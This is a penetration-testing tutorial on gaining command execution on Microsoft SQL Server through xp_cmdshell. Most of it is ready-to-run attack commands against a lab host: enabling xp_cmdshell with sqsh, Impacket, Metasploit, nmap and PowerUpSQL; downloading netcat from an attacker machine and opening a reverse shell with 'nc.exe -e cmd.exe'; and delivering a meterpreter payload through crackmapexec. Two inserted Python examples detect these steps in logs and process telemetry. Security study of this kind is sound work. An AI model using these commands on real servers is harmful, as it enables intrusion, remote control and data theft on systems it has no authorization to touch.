MSSQL for Pentester: Command Execution with xp_cmdshell
This is the third article in our series on MSSQL Server penetration testing. In this article, we will explore the security aspects of the xp_cmdshell functionality and how it can be exploited.
Table of Contents
- What is xp_cmdshell?
- Enabling xp_cmdshell
- Manually (GUI)
- Exploiting xp_cmdshell:
All the demonstrations in this article will be presented on the MSSQL Server. To get the MS-SQL server set up, you can refer to our article: Penetration Testing Lab Setup: MS-SQL. Previously, we briefly discussed exploiting the xp_cmdshell functionality with the help of the Metasploit module exploit/windows/mssql/mssql_payload in our article: MSSQL Penetration Testing with Metasploit. In that article, however, we did not explain the background of the xp_cmdshell functionality or its security aspects, which we will discuss here.
What is xp_cmdshell?
According to the official Microsoft documentation, xp_cmdshell is a functionality that spawns a Windows command shell and passes in a string for execution. Any output it generates is returned as rows of text. Put simply, it allows database administrators to access and execute any external process directly from the SQL Server. The implementation of xp_cmdshell can be traced back to SQL Server 6.5. It was designed to combine SQL queries with system commands in order to automate tasks that would otherwise require additional programming and work. Now that we have some knowledge of xp_cmdshell, we can see how it can be enabled on a SQL server.
By default, the function of xp_cmdshell is disabled in the SQL server. We need to have administrator privileges to enable it. In the demonstration below, we are using the credentials of the SA user to log in on the SQL server.
Now that we have the SQL instance running as Administrator, we need to access the Object Explorer section. Here, we have the SQL Server Instance; we right-click on the instance to find a drop-down menu. We need to choose the “Facets” option from this menu, as demonstrated below:
Clicking on the Facets option will open a new window. It will have a field with the various types of facets available. We need to choose the Surface Area Configuration facets from the drop-down menu, as shown in the image below:
After choosing the surface area configuration facet, we see that we have the XPCmdShellEnabled option set as false.
Clicking on the XP command shell option, we change its value from false to true, as shown in the figure below. This way, we can enable XP command shell using the graphical user interface on a Windows MSSQL Server.
Next, we use the sqsh tool on the Kali machine to check whether the xp_cmdshell option is enabled on the target machine. The syntax for this tool is quite simple: type sqsh with -S and the target IP address, followed by -U with the username of the server admin and -P with the password for that user, as shown in the image below.
sqsh -S 192.168.1.146 -U sa -P "Password@1"
xp_cmdshell 'whoami';
go
As we can observe from the image, the SQL Server blocked access to the xp_cmdshell procedure, so we will enable it now. To enable xp_cmdshell on the target machine using sqsh, we run a series of commands. The first makes the advanced options visible through sp_configure. The second selects the xp_cmdshell option and activates it. Finally, we run the RECONFIGURE command, which enables the xp_cmdshell option on the target machine, as shown in the image given below.
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go
We can verify the change the same way we checked it earlier with the GUI option.
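Each sp_configure change in the sequence above is written to the SQL Server error log as a "Configuration option ... changed from X to Y" message, so the enabling step can be detected after the fact. The following is an added example, not part of the original article: it scans constructed sample log lines for xp_cmdshell being switched on, and the function names and sample entries are assumptions made for illustration.

```python
import re

# Error-log message SQL Server writes whenever sp_configure changes an option.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+s?)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed sample lines in ERRORLOG layout (not taken from the article's lab).
SAMPLE_ERRORLOG = """\
2024-03-04 09:12:01.17 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]
2024-03-04 09:12:05.42 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-04 09:12:05.44 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-04 11:30:12.03 spid61      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-03-04 14:02:33.90 spid63      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""


def xp_cmdshell_events(log_text):
    """Return every xp_cmdshell state change found in the log, in log order."""
    events = []
    advanced_sessions = set()  # sessions that switched on 'show advanced options'
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option, old, new = m["option"], int(m["old"]), int(m["new"])
        if option == "show advanced options" and new == 1:
            advanced_sessions.add(m["spid"])
        elif option == "xp_cmdshell" and old != new:
            events.append({
                "time": m["ts"],
                "spid": m["spid"],
                "action": "enabled" if new == 1 else "disabled",
                # True when the same session first exposed the advanced options,
                # which is the sequence shown in the article.
                "same_session_advanced": m["spid"] in advanced_sessions,
            })
    return events


def enabled_alerts(log_text):
    """Only the changes that turn xp_cmdshell on; these are the ones to triage."""
    return [e for e in xp_cmdshell_events(log_text) if e["action"] == "enabled"]


if __name__ == "__main__":
    for alert in enabled_alerts(SAMPLE_ERRORLOG):
        print(alert["time"], alert["spid"], "xp_cmdshell enabled")
```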
MS SQL consists of Windows services that run under service accounts. Whenever an instance of SQL Server is installed, a set of Windows services with unique names is installed along with it. Below are the SQL Server account types:
- Windows Accounts
- SQL Server Login
- DB Users
To use mssqlclient.py, we need to specify the username, domain, password, the target IP address, and the port hosting the MSSQL service, as shown in the image. Here we can use the command enable_xp_cmdshell to enable command shell functionality on the target machine.
python3 mssqlclient.py WORKGROUP/sa:Password@1@192.168.1.146 -port 1433
enable_xp_cmdshell
Again, we can verify it the same way we did with the GUI approach and the sqsh approach. Here we can see that we were able to enable the xp_cmdshell functionality with the help of mssqlclient, which is a part of the Impacket toolkit.
Previously, mssqlclient.py was used to connect to the database with the database credentials of the SA user. Now we connect to the database with a Windows user's login credentials.
python3 mssqlclient.py ignite:'Password@123'@192.168.1.146 -windows-auth
enable_xp_cmdshell
As usual, Metasploit also plays its role to enable the XP command shell and helps us exploit the target and provide the session.
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set password Password@1
exploit
The exploit does not stop at just enabling xp_cmdshell. It then runs a series of commands that help us get a meterpreter shell on the target machine, as shown in the image below.
You can use another module, mssql_exec, which primarily enables xp_cmdshell and also lets us set any cmd executable command. Here we set the cmd command to "ipconfig".
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.146
set password Password@1
set cmd "ipconfig"
exploit
Here, we can use netcat to get a reverse connection on the target machine. To do so, we first need to transfer the netcat binary file to the Windows machine. For this, we will use the nc.exe executable. This file is located at /usr/share/windows-binaries. Then we can use the Python one-liner to create an HTTP service.
cd /usr/share/windows-binaries
ls -al
python -m SimpleHTTPServer 80
Here, powershell.exe invokes PowerShell and then uses the wget command to download netcat into the C:/Users/Public directory, which is writable. Then we use xp_cmdshell to execute the netcat binary so that it runs cmd.exe, creating a reverse connection to the host Kali machine on port 4444.
xp_cmdshell "powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.2 4444"
In Kali Linux, we have a netcat listener on port 4444; once the PowerShell command executes as shown in the above screenshot, we get the shell of the target machine.
nc -lvp 4444
whoami
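Commands issued through xp_cmdshell run in a cmd.exe spawned by the SQL Server service process (sqlservr.exe), so the download and netcat steps above appear as descendants of sqlservr.exe in process-creation telemetry. The following is an added example, not part of the original article: it walks process ancestry over constructed records and flags anything running under sqlservr.exe. The field names (pid, ppid, image, cmdline), the paths and the sample records are assumptions, and PID reuse is ignored.

```python
import ntpath

SQL_IMAGE = "sqlservr.exe"

# Constructed process-creation records (not real telemetry); cmdlines mirror the article.
SAMPLE_EVENTS = [
    {"pid": 1820, "ppid": 640, "image": r"C:\SQL\Binn\sqlservr.exe", "cmdline": "sqlservr.exe -sSQLEXPRESS"},
    {"pid": 4100, "ppid": 1820, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'"C:\Windows\system32\cmd.exe" /c whoami'},
    {"pid": 4104, "ppid": 4100, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"pid": 4200, "ppid": 1820, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'"C:\Windows\system32\cmd.exe" /c powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\Users\Public\nc.exe'},
    {"pid": 4212, "ppid": 4200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": r"powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\Users\Public\nc.exe"},
    {"pid": 900, "ppid": 640, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]


def sql_depth(event, by_pid):
    """Hops from this process up to sqlservr.exe, or None if it is not an ancestor."""
    depth, seen, cur = 0, set(), event
    while cur["ppid"] in by_pid and cur["pid"] not in seen:
        seen.add(cur["pid"])          # guards against malformed, cyclic records
        cur = by_pid[cur["ppid"]]
        depth += 1
        if ntpath.basename(cur["image"]).lower() == SQL_IMAGE:
            return depth
    return None


def flag_sql_descendants(events):
    """Return every process that runs underneath the SQL Server service process."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        depth = sql_depth(e, by_pid)
        if depth is not None:
            hits.append({
                "pid": e["pid"],
                "depth": depth,  # 1 = spawned directly by sqlservr.exe (the xp_cmdshell shell)
                "image": ntpath.basename(e["image"]).lower(),
                "cmdline": e["cmdline"],
            })
    return hits


if __name__ == "__main__":
    for hit in flag_sql_descendants(SAMPLE_EVENTS):
        print(hit["depth"], hit["pid"], hit["image"], hit["cmdline"])
```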
Another method to get a reverse connection on the target machine through xp_cmdshell is to use its ability to run system commands together with the web_delivery payload. The process is quite simple: we use the exploit/multi/script/web_delivery exploit, set the target to the Windows machine, and set the payload to windows/meterpreter/reverse_tcp. Then we specify the local host (lhost). Finally, we run the exploit command.
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
The exploit above gives us the web_delivery URL, which we then pass to the web_delivery module of crackmapexec.
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B
The output of the crackmapexec shows that the target has been pwned. We can go back to the Metasploit shell and find that the target has been exploited successfully, and we have a meterpreter shell on the target machine.
As we know, xp_cmdshell is disabled by default, but if we have sysadmin credentials, we can also use the Nmap script to execute Windows commands.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd='net user' 192.168.1.146
First, download PowerUpSQL from here. PowerUpSQL is a tool for Windows machines that includes functions supporting SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution.
We can use the Import-Module cmdlet to import the PowerShell script. Then we use the Invoke-SQLOSCmd function, which runs OS commands via xp_cmdshell through the SQL service account.
Here, PowerUpSQL tries to connect to the database. Once the connection succeeds, it checks whether the credentials we provided belong to a sysadmin or to a user with sysadmin access. It first enables the advanced options and then tries to enable the xp_cmdshell functionality. In this demonstration, xp_cmdshell is already enabled, so the tool runs the whoami command, which shows that we are the nt service/MSSQL$sqlexpress user.
cd PowerUPSQL-master
powershell
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Command whoami -Verbose
This article was designed to give users material that can help them whenever they perform penetration testing on MSSQL Servers by exploiting the xp_cmdshell functionality. The point of this article is not to speculate on how the user obtained the credentials or how they were able to elevate to sysadmin access. Instead, it shows that when or if the user gets those privileges, they can move on to execute multiple commands on the target system and do more damage.